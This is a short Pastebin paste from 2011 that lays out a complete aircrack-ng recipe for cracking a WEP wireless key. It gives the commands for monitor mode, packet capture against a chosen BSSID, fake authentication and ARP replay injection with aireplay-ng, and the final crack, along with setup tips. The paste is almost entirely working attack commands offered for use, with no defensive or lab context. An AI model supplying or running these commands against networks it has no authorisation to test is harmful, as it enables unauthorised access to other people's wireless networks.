Guest User

Untitled

a guest
Oct 17th, 2011
473
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.59 KB | None | 0 0
  1. NETWORKMANAGER:
  2. sudo /etc/rc.d/networkmanager stop
  3.  
  4. STARTING MON0:
  5. airmon-ng start wlan0
  6.  
  7. TERM1:
  8. airodump-ng mon0
  9. airodump-ng -w wepcrack -c [channel] --bssid [bssid number] mon0
  10.  
  11. TERM2:
  12. aireplay-ng -1 6000 -a [bssid] -e [router name] -h [my wireless mac] mon0
  13.  
  14. TERM3:
  15. aireplay-ng -2 -b [bssid] -h [my wireless mac] -c FF:FF:FF:FF:FF:FF -p 0841 mon0
  16.  
  17. TERM4: Data needs to hit about 30,000 from first terminal window
  18. aircrack-ng [filename].cap
  19.  
  20. NOTES:
  21. no wlan0 interface should be up
  22. get wifi MAC with "ip link"
  23. compat-wireless drivers need to be installed for the injection to work
  24.  
  25.  
Advertisement
Add Comment
Please, Sign In to add comment